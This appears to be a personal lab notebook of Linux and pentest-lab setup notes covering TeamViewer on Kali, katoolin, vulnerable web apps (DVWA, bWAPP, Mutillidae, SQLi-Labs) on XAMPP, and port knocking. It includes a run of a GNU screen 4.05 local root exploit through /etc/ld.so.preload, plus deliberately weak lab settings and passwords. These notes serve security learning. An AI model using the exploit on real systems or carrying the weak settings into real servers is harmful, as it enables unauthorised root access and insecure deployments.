TeamViewer installation on Kali

-install sddm as default X windows because default X windows in Kali didn’t allow remote TeamViewer without login GUI first

# apt-get install sddm

# dpkg –add-architecture i386
# apt-get update
# dpkg -i –force-depends teamviewer_i386.deb
# apt-get install -f

# teamviewer –daemon start

-get current TeamViewer id either from GUI or CLI
# teamviewer –info print version, status, id
 TeamViewer                           12.0.71510  (DEB)
 teamviewerd status                   ● teamviewerd.service – TeamViewer remote control daemon
   Loaded: loaded (/etc/systemd/system/teamviewerd.service; enabled; vendor preset: disabled)
   Active: active (running) since Sun 2017-03-19 09:02:02 PDT; 9min ago
  Process: 1140 ExecStart=/opt/teamviewer/tv_bin/teamviewerd -d (code=exited, status=0/SUCCESS)
 Main PID: 1162 (teamviewerd)
    Tasks: 12 (limit: 4915)
   CGroup: /system.slice/teamviewerd.service
           └─1162 /opt/teamviewer/tv_bin/teamviewerd -d
Mar 19 09:02:00 kali2 systemd[1]: Starting TeamViewer remote control daemon…
Mar 19 09:02:02 kali2 systemd[1]: Started TeamViewer remote control daemon.

 TeamViewer ID:                        798024234

-run teamviewer gui
# teamviewer
click Connection/Setup Unattended Access
click Next
Image.png
Image.png

click Finish

Now you can remotely connect to your Linux TeamViewer
NOTE:
-every time you adding device or login to new device while login to your TeamViewer a/c. TeamViewer will ask your permission by sending an email with title “Device authorization needed”
Just click a link in that email to add your device into your TV a/c

MichaCry an Automatic Pentesting Tools

# cd /root
# apt-get install figlet -y
# cd MichaCry
# chmod +x michaCry.sh personalCom.sh setup.sh webApp.sh wireless.sh
# vi setup.sh
change this part
# vi michaCry.sh
change
espeak
to

echo

# ./setup.sh
# ./michaCry.sh

20170304 17.15.jpg

screen root privillege escalation

NOTE:
-this exploit will make normal user become root
-tried working with Ubuntu 13.x with old patches but not with Debian 8 or Parrot with latest patches

If you don’t have screen 4.05 then you need to install or compile yourself
# apt-get install screen
or
# cd /root
# cd screen-4.5.0
# apt-get install libncurses5-dev
# ./configure;make;make install

# screen -v
Screen version 4.05.00 (GNU) 10-Dec-16

# su – user1
$ ./screenroot.sh
~ gnu/screenroot ~
[+] First, we create our shell and library…
[+] Now we create our /etc/ld.so.preload file…
[+] Triggering…
‘ from /etc/ld.so.preload cannot be preloaded: ignored.
[+] done!
No Sockets found in /tmp/screens/S-user1.

# whoami
root

Installing FireFox on Debian

# echo “deb http://mozilla.debian.net/ jessie-backports firefox-release” >> /etc/apt/sources.list.d/mozilla-firefox.list
# cat /etc/apt/preferences.d/mozilla-firefox
Package: *
Pin: origin mozilla.debian.net
Pin-Priority: 501

# apt-get update
# apt-cache policy firefox
firefox:
  Installed: 51.0.1-3
  Candidate: 51.0.1-3
  Version table:
 *** 51.0.1-3 1001
       1001 http://mirrordirector.archive.parrotsec.org/parrot stable/main amd64 Packages
        100 /var/lib/dpkg/status
     51.0.1-3~bpo80+1 501
        501 http://mozilla.debian.net jessie-backports/firefox-release amd64 Packages

# apt-get install firefox -y

Installing Kali tool on Debian

We need katoolin for that purpose

# cd /root
# cd katoolin
# ln -s katoolin.py katoolin
# chmod +x katoolin
# ./katoolin
1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 1
1) Add kali linux repositories
2) Update
3) Remove all kali linux repositories
4) View the contents of sources.list file
What do you want to do ?> 1

1) Add kali linux repositories
2) Update
3) Remove all kali linux repositories
4) View the contents of sources.list file
What do you want to do ?> 2

1) Add kali linux repositories
2) Update
3) Remove all kali linux repositories
4) View the contents of sources.list file
What do you want to do ?> back

1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 2

1) Information Gathering                        8) Exploitation Tools
2) Vulnerability Analysis                       9) Forensics Tools
3) Wireless Attacks                             10) Stress Testing
4) Web Applications                             11) Password Attacks
5) Sniffing & Spoofing                          12) Reverse Engineering
6) Maintaining Access                           13) Hardware Hacking
7) Reporting Tools                              14) Extra
0) All
Select a category or press (0) to install all Kali linux tools .
kat > 0
Do you want to continue? [Y/n]

1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 3
Do you want to install classicmenu indicator ? [y/n]> y

1) Add Kali repositories & Update
2) View Categories
3) Install classicmenu indicator
4) Install Kali menu
5) Help
kat > 4
Do you want to install Kali menu ? [y/n]> y

Installing Vulnerable bWAPP, DVWA, Joomla, Mutillidae2, SQLi-Labs, XAMPP, WordPress on TurnKey LAMP

Download and install TurnKey LAMP ova from
set VBox Settings/Display/Screen/Video Memory to 6MB
set NIC1 to Bridge in VBox
Image.png
Set NIC2 to Host only
Image.png
click Advanced Menu
Image.png
select Networking, click Select
Image.png
Set eth0 to dhcp and eth1 to static

Image.png

XAMPP
# cd /root
# apt list –installed
find apache and mysql packages name there
# service mysql stop
# apt-get purge mysql-server mysql-client mysql-common
# apache2ctl stop
# apt-get purge apache2 apache2-utils apache2.2-bin
# apt-get autoremove

# apt-get autoclean

-download xampp
# chmod 755 xampp-linux-x64-5.6.30-0-installer.run
# ./xampp-linux-x64-5.6.30-0-installer.run
————————————————————————–
Welcome to the XAMPP Setup Wizard.
————————————————————————–
Select the components you want to install; clear the components you do not want
to install. Click Next when you are ready to continue.
   XAMPP Core Files : Y (Cannot be edited)
   XAMPP Developer Files [Y/n] :
   Is the selection above correct? [Y/n]:
Installation Directory
   XAMPP will be installed to /opt/lampp
   Press [Enter] to continue:
Setup is now ready to begin installing XAMPP on your computer.

   Do you want to continue? [Y/n]:

# cd /opt/lampp
# sed -i s/’local’/’all granted’/ etc/extra/httpd-xampp.conf
# lampp start
NOTE:
-to restart apache only
# /opt/lampp/bin/apachectl restart

-apache docs location on /opt/lampp/htdocs

bWAPP (Buggy Web Application)
# cd /root
# mkdir -p /opt/lampp/htdocs/bwapp
# mv download?source=files bwapp/bWAPP_latest.zip /opt/lampp/htdocs/bwapp/bwapp.zip
# cd /opt/lampp/htdocs/bwapp
# unzip bwapp.zip
# rm bwapp.zip
# vi bWAPP/admin/settings.php
set this part

$db_password = “”;

# cd bWAPP
# chmod 777 documents images passwords
-open your browser and go to http://10.0.1.44/bwapp/bWAPP/install.php
click on here
L: bee
P: bug

Image.png

DVWA
-download dvwa
# cd /root
# mv DVWA /opt/lampp/htdocs/dvwa
# cd /opt/lampp/htdocs/dvwa
# chmod 766 hackable/uploads
# chown root:root hackable/uploads
# chmod 766 external/phpids/0.6/lib/IDS/tmp/phpids_log.txt
Sign-in with your gmail account
click Continue
click Get reCAPTCHA
on Label and Domains type your domain i.e: domain.com
click Register
You will get Site and Secret key
# cd /opt/lampp/htdocs/dvwa/config
# cp -p config.inc.php config.inc.php.bak
# vi config.inc.php
-set your mysql root password
$_DVWA[ ‘db_password’ ] = ‘Passw0rd’;
-insert Site > public key and Secret > private key into this part
$_DVWA[ ‘recaptcha_public_key’ ]  = ‘6LdaMRYUAAAAAGH_Wjgn15xUmdcXTMP9YpBJ7y3n1’;

$_DVWA[ ‘recaptcha_private_key’ ] = ‘6LdaMRYUAAAAALsTFuYgrGbeozX2efE3EOz11T5x1’;

Set “allow_url_include = On”
# sed -i s/’allow_url_include=Off’/’allow_url_include=On’/ /opt/lampp/etc/php.ini
# /opt/lampp/bin/apachectl restart
go to http://10.0.1.44/dvwa/
click Create/Reset Database
go to http://10.0.1.44/dvwa/login.php
L: admin

P: password

JOOMLA
# cd /root
# mv joomla_3-6-5-stable-full_package-zip\?format\=zip joomla-3.6.5.zip
# unzip joomla-3.6.5.zip -d joomla
# mv joomla /opt/lampp/htdocs
# cd /opt/lampp
# sed -i s/’display_errors=On’/’display_errors=Off’/ etc/php.ini
# sed -i s/’output_buffering=4096’/’output_buffering=Off’/ etc/php.ini
# cd /opt/lampp/htdocs/joomla/
# cp installation/model/configuration.php .
# chmod 777 configuration.php
# /opt/lampp/bin/apachectl restart
go to http://10.0.1.44/joomla/installation/index.php
Configuration
Select Langunage: English (United States)
Site Name: joomla
Description:
Site Offline: Yes
Administrator Email: admin@gmail.com
Administrator Username: root
Administrator Password:
Confirm Administrator Password:
click Next
Database
Database Type: MySQLi
Host Name: localhost
Username: root
Password:
Database Name: joomla
Table Prefix: j00mla_
Old Database Process: Backup
click Next
FTP
click Next
Overview
Install Sample Data: Learn Joomla English (GB) Sample Data
Email Configuration: No
click Install
click Remove installation folder
if you got error
# cd /opt/lampp/htdocs/joomla
# rm -rf installation
# chmod 644 configuration.php
go to http://10.0.1.44/joomla/
L: root

P:

NOWASP Mutillidae 2
# cd /root
# apt-get install software-properties-common python-software-properties php5-curl -y
# mv download\?source\=files mutillidae.zip
# unzip mutillidae.zip
# mv mutillidae /opt/lampp/htdocs/
# cd /opt/lampp/htdocs/mutillidae
# vi classes/MySQLHandler.php
set your MySQL password here
        static public $mMySQLDatabasePassword = “”;
-only allow access from your network
# vi .htaccess
Allow from 10.0.1.0/24
# /opt/lampp/bin/apachectl restart
go to http://10.0.1.44/mutillidae
click setup/reset the DB
Image.png
click OK

Image.png

SQLi-Labs
# cd /root
# unzip master.zip
# mv sqli-labs-master /opt/lampp/htdocs/sqli
# cd /opt/lampp/htdocs/sqli
# vi sql-connections/db-creds.inc
set mysql password i.e.
$dbpass =”;
open browser and go to http://10.0.1.44/sqli
click Setup/reset Database for labs

Image.png

WORDPRESS
NOTE:
UBUNTU
-because TurnKey LAMPP doesn’t have required gcc for compiling pcre lib, we need to do this in other Ubuntu server.
After compiling then copy the lib into 10.0.1.44 TurnKey LAMPP
download pcre
# cd /root
# tar xf pcre-8.40.tar
# cd /pcre-8.40
# ./configure –prefix=/tmp –enable-utf8 –enable-unicode-properties ; make ; make install
# cd /tmp
# tar cf lib.tar lib

# scp lib.tar root@10.0.1.44/tmp

TURNKEY LAMPP
-copy lib into /opt/lampp/lib
# cd /opt/lampp/lib
# cp /tmp/lib/* .

-create empty wordpress db
go to http://10.0.1.44/phpmyadmin
click New on top left
Create database: wordpress

click Create

# mv WordPress /opt/lampp/htdocs/
# cd /opt/lampp/htdocs
# mv WordPress wordpress
# cd /opt/lampp/htdocs/wordpress
go to http://10.0.1.44/wordpress

click Let’s go!

Database Name: wordpress
Username: root
Password: Passw0rd
Database Host: localhost
Table Prefix: wp_
click Submit
You will get warning “Sorry, but I can’t write the wp-config.php file”.
Paste the content shown into wp-config.php
# vi wp-config.php

click  “Run the install”

Information needed
Site Title: wordpress
Username: root
Password: Passw0rd
Your Email:
Search Engine Visibility:
click Install WordPress
NOTE:

-you can go to http://10.0.1.44/wordpress/wp-admin/ for admin purposes

Create xampp startup script
# cat /etc/init.d/lampp
#! /bin/sh
### BEGIN INIT INFO
# Provides:             xampp
# Required-Start:       $remote_fs $syslog
# Required-Stop:        $remote_fs $syslog
# Default-Start:        2 3 4 5
# Default-Stop:         0 1 6
# Short-Description: Execute the xampp command.
# Description:
### END INIT INFO
PATH=/sbin:/usr/sbin:/bin:/usr/bin
case “$1” in
  start)
        /opt/lampp/lampp start
        ;;
  restart|reload|force-reload)
        /opt/lampp/lampp restart
        ;;
  stop)
        /opt/lampp/lampp stop
        ;;
  status)
        /opt/lampp/lampp status
        ;;
  *)
        echo “Usage: $0 start|stop|restart|status”
        ;;
esac

# chmod 755 /etc/init.d/lampp
# insserv -d /etc/init.d/lampp
# systemctl enable lampp

Port Knocking

BY using port knocking, we can open or close the port if we know the knock order

VM: KALI2 (Server) KALI2 (Client)

KALI2 (Server)
# apt-get install knockd -y
# cat /etc/default/knockd
START_KNOCKD=1

# cat /etc/knockd.conf
[options]
UseSyslog
Interface=eth1
#change eth1 accordingly
[openSSH]
sequence = 7000,8000,9000
seq_timeout = 5
command = /sbin/iptables -I INPUT -s %IP% -p tcp –dport 22 -j ACCEPT
tcpflags = syn
[closeSSH]
sequence = 9000,8000,7000
seq_timeout = 5
command = /sbin/iptables -D INPUT -s %IP% -p tcp –dport 22 -j ACCEPT
tcpflags = syn

# iptables -A INPUT -i lo -j ACCEPT
# iptables -A INPUT -m conntrack –ctstate ESTABLISHED,RELATED -j ACCEPT
# iptables -A INPUT -p tcp –dport 22 -j REJECT
# iptables -S
# mkdir /etc/iptables
# iptables-save > /etc/iptables/rules.v4
# iptables-restore < /etc/iptables/rules.v4
-if using ip6
# ip6tables-save > /etc/iptables/rules.v6
# ip6tables-restore < /etc/iptables/rules.v6
# service knockd start

KALI2 (Client)
-nmap shown ssh port filtered
# nmap 10.0.1.12
PORT STATE SERVICE
22/tcp filtered ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds

# apt-get install knockd -y
# ssh root@ 10.0.1.12
connection refused
# knock 10.0.1.12 7000 8000 9000
# ssh root@ 10.0.1.12
connection successful
# knock 10.0.1.12 9000 8000 7000
# ssh root@ 10.0.1.12
connection refused